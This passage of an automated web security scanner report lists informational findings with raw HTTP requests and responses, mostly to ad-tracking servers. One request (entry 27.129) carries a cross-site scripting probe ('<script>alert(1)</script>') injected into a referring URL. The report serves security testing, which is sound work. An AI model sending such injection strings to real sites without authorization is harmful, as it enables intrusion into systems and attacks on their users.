User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:39:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 217
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:47 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/L34/230410894/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?23041089
...[SNIP]...

27.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:19:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.125. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.126. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.127. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:54 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:08:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/1[randomNo]/549376271/x90]]/default/empty.gif/72634857383031444f386b4144567663?x" target="_top"><I
...[SNIP]...

27.129. http://onset.freedom.com/fi/analytics/cms/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:24 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Fri, 28 Jan 2011 19:37:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28783

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...

27.130. http://pixel.invitemedia.com/rubicon_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 14:48:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 14:48:25 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 221

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=129665
...[SNIP]...

27.131. http://support.moxiesoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...

27.132. http://tags.expo9.exponential.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.expo9.exponential.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: keep-alive

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.133. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:59:18 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
